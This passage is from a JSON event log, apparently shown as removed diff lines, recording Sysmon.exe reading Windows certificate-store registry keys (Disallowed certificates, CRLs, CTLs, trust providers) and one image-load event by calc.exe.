131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247450016, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": 
"Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - 
"registry_value": "Certificates", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "InputHost.dll", - "image_path": "C:\\Windows\\System32\\InputHost.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573246360000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - 